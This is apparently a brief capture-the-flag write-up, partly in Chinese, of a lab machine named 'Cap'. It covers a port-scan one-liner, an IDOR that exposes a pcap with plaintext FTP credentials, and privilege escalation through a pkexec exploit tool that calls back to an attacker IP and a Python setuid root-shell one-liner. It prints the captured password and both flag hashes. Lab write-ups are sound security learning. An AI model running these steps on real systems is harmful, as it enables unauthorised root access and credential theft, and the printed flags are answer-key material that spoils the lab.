Information Gathering

$ ip='10.10.10.245'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa80a9b2ca3b8869a4289e390d27d575 (RSA)
|   256 96d8f8e3e8f77136c549d59db6a4c90c (ECDSA)
|_  256 3fd0ff91eb3bf6e19f2e8ddeb3deb218 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Sun, 09 Feb 2025 07:26:55 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 09 Feb 2025 07:26:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html   lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="https://www.freebuf.com/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="https://www.freebuf.com/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="https://www.freebuf.com/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="https://www.freebuf.com/static/css/themify-icons.css">
|     <link rel="stylesheet" href="https://www.freebuf.com/static/css/metisMenu.css">
|     <link rel="stylesheet" href="https://www.freebuf.com/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="https://www.freebuf.com/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 09 Feb 2025 07:26:49 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
|_http-server-header: gunicorn
|_http-title: Security Dashboard

gunicorn && IDOR && FTP Plaintext Transmission

$ whatweb 10.10.10.245 -v

http://10.10.10.245/data/0

下载pcap流量包分析

password:Buck3tH4TF0RM3!

user:nathan

User.txt

843d0489c2faefa9d03d5552718bbc46

Privilege escalation:TRP00F && Python SUID

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

Python SUID

nathan@cap:/tmp$ /usr/bin/python3.8 -c 'import os;os.setuid(0);os.system("/bin/bash")'

Root.txt

eef16ddfee548443df6b2fe4dcf70a67

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）